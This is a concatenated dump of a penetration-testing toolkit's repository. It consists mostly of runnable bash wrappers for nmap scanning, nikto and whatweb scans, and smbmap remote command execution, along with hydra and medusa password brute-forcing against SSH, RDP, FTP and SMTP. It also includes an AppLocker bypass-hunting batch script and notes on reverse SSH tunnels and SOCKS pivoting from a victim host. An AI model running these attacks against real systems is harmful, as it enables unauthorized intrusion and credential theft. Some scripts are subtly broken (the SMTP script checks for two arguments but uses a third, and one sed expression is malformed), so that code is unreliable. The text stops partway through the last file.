| 24 | 25 | if [ $# -eq 2 ]; then 26 | smbmap -H $1 -P $2 -R 2>&1 | tee -a "smbmap-list-contents_$1_$2.txt"; smbmap -u null -p "" -H $1 -P $2 -R 2>&1 | tee -a "smbmap-list-contents_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/brute-force-smtp-hydra.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | hydra -v -l $1 -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $3 -e nsr -o "smtp_$2_$3_hydra.txt" -f smtp://$2 26 | else 27 | echo "Please provide the target email account, the SMTP server and its port." 28 | fi 29 | -------------------------------------------------------------------------------- /ldap/scan-ldapsearch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 5 ]; then 26 | ldapsearch -v -x -D $3 -w $4 -p $2 -h $1 -b $5 -s sub "(objectclass=*)" 2>&1 | tee > "ldap_all-entries_$1_$2.txt" 27 | else 28 | echo "Please provide the target host, port, username, password and base dn(dc=example,dc=com)." 29 | fi 30 | -------------------------------------------------------------------------------- /misc/print-top-tcp-ports.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | nmap -oX - -sT --top-ports $1 2>/dev/null | grep 'services=' | sed 's/||g' 27 | else 28 | echo "Please provide number of ports." 29 | fi 30 | -------------------------------------------------------------------------------- /smb/scan-share-permissions.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | smbmap -H $1 -P $2 2>&1 | tee -a "smbmap-share-permissions_$1_$2.txt"; smbmap -u null -p "" -H $1 -P $2 2>&1 | tee -a "smbmap-share-permissions_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/web-app-framework.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | whatweb -v -a 3 -U='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36' --log-verbose=whatweb_results.txt $1 27 | else 28 | echo "Please provide target url." 29 | fi 30 | -------------------------------------------------------------------------------- /grep/grep-unique-open-ports-comma.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2019 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | cat $1/*.gnmap | grep "Ports:" | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/\/open.*//p' | sed -e 's/^[ \t]*//' | sort -n | uniq | tr '\n' ',' | sed 's/,$//g' 26 | echo 27 | else 28 | echo "Please provide a directory path." 29 | fi 30 | -------------------------------------------------------------------------------- /applocker/Readme.md: -------------------------------------------------------------------------------- 1 | ## AppLocker - Notes 2 | 3 | #### Detect bypasses 4 | 5 | - A more effective executable, such as a simple infinite loop binary, should be used instead of something like calc.exe, which may only remain active in the background for a short time. This will provide your script with sufficient time to detect the process in the task list and log it accordingly. 6 | 7 | ``` 8 | @echo off 9 | 10 | C: 11 | cd C:\TEMP\ 12 | 13 | 14 | echo Creating a recursive list of all directories and sub-directories of the selected folder e.g. c:\ 15 | dir C:\ /s /b /o:n /a:d > C:\TEMP\dirs.txt 16 | 17 | 18 | echo Attempting to copy calc.exe to all folders (write permission check) 19 | for /F "tokens=*" %%A in (dirs.txt) do copy "C:\Windows\System32\calc.exe" "%%A" /Y 20 | 21 | echo Attempting to execute calc.exe (execution permission check) 22 | for /F "tokens=*" %%A in (dirs.txt) do if exist "%%A\calc.exe" icacls "%%A\calc.exe" /grant %USERNAME%:f & start "" "%%A\calc.exe" && tasklist /v | findstr "calc.exe" > executed.txt && for %%B in (executed.txt) do if not %%~zB==0 echo %%A >> bypasses.txt && taskkill /IM calc.exe /F && del /F executed.txt 23 | 24 | echo Deleting calc.exe from all locations 25 | for /F "tokens=*" %%A in (dirs.txt) do del /F "%%A\calc.exe" 26 | 27 | echo Done 28 | ``` 29 | 30 | --- 31 | -------------------------------------------------------------------------------- /reconnaissance/ips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | while read line || [[ -n "$line" ]]; do 27 | echo "IP Lookup - $line" 28 | host $line | grep "has address" | cut -d" " -f4 > "ip-address-$line.txt" 29 | done < "$1" 30 | else 31 | echo "Please provide a file containing a list of target hosts." 32 | fi 33 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-fulltcpcon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | nmap -sT -vv -r -p- --reason --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1 26 | else 27 | echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 28 | fi 29 | -------------------------------------------------------------------------------- /web/nikto-scan-proxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 4 ]; then 26 | nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html -useproxy $4 2>&1 | tee "$1_$2_$3_nikto.txt" 27 | else 28 | echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the proxy server." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/brute-force-ftp-hydra.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $2 -e nsr -f -o "ftp_$1_$2_hydra.txt" ftp://$1 26 | else 27 | echo "Please provide the target FTP server and its port." 28 | fi 29 | -------------------------------------------------------------------------------- /misc/responds-to-ping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | 26 | if [ $# -eq 1 ]; then 27 | response=$(ping -c 1 $1 | grep 'received' | cut -d, -f2 | sed 's/received//' | sed 's/ //') 28 | if [ "$response" -eq "1" ]; then 29 | echo "$1 YES" 30 | else 31 | echo "$1 NO" 32 | fi 33 | else 34 | echo "Please provide an IP address." 35 | fi 36 | -------------------------------------------------------------------------------- /smb/scan-execute-command.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | smbmap -H $1 -P $2 -x "ipconfig /all" 2>&1 | tee -a "smbmap-execute-command_$1_$2.txt"; smbmap -u null -p "" -H $1 -P $2 -x "ipconfig /all" 2>&1 | tee -a "smbmap-execute-command_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/brute-force-rdp-hydra.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $2 -e nsr -f -t 2 -o "rdp_$1_$2_hydra.txt" rdp://$1 26 | else 27 | echo "Please provide the target RDP server and its port." 28 | fi 29 | -------------------------------------------------------------------------------- /cracking/brute-force-ssh-hydra.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $2 -e nsr -f -o "ssh_$1_$2_hydra.txt" ssh://$1 26 | 27 | else 28 | echo "Please provide the target SSH server and its port." 29 | fi 30 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | nmap -sT -vv -r -p- --reason -Pn --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1 26 | else 27 | echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 28 | fi 29 | -------------------------------------------------------------------------------- /web/nikto-scan-useragent.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 4 ]; then 26 | nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html -useragent $4 2>&1 | tee "$1_$2_$3_nikto.txt" 27 | else 28 | echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the user agent string." 29 | fi 30 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -vv -p- --reason --open -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /cracking/brute-force-ftp-medusa.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "ftp_$1_$2_medusa.txt" -M ftp -h $1 26 | else 27 | echo "Please provide the target FTP server and its port." 28 | fi 29 | -------------------------------------------------------------------------------- /cracking/brute-force-ssh-medusa.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "ssh_$1_$2_medusa.txt" -M ssh -h $1 26 | else 27 | echo "Please provide the target SSH server and its port." 28 | fi 29 | -------------------------------------------------------------------------------- /misc/ssh.md: -------------------------------------------------------------------------------- 1 | ## SSH Tunnels 2 | 3 | ### Reverse SSH Tunnel 4 | 5 | *From the victim machine to our attacking box.* 6 | 7 | ```bash 8 | plink -l root -pw -R 3390:127.0.0.1:3389 9 | ``` 10 | 11 | ### SSH Local Port Forwarding 12 | 13 | ```bash 14 | ssh -L 0.0.0.0:4444::4444 15 | ``` 16 | 17 | ```bash 18 | ssh -L 10443::443 user@ 19 | ``` 20 | 21 | ```bash 22 | ssh -L 0.0.0.0:45001::80 user@ 23 | ``` 24 | 25 | ### SSH Dynamic Port Forwarding 26 | 27 | * Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy. 28 | * SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim. 29 | * Forward/Tunnel and redirect our traffic to the victim's machine. 30 | 31 | ```bash 32 | ssh -f -N -D 9050 root@victim.example.com 33 | ``` 34 | 35 | * proxychains 36 | 37 | ```bash 38 | nano /etc/proxychains.conf 39 | ``` 40 | 41 | * Content 42 | 43 | ```bash 44 | [ProxyList] 45 | #... 46 | socks4 127.0.0.1 9050 47 | ``` 48 | 49 | * Run e.g. nmap 50 | 51 | ```bash 52 | proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open 53 | ``` 54 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -n -vv -p- --reason --open -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -vv --top-ports 1000 --open -oA tcp_ports_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -vv -p- -Pn --reason --open -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/udp/udp-ports-scan-top1000.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 